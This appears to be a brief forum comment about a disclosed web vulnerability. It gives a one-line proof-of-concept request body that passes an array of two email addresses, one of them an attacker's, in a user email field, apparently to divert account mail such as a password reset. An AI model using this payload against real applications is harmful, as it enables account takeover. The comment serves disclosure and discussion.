Didn't get much notice from my post of it: https://news.ycombinator.com/item?id=38961910

The POC is quite trivial for it:

user[email][]=valid@email.com&user[email][]=attacker@email.com

It was severe enough that paid customers got a heads up to be ready to patch.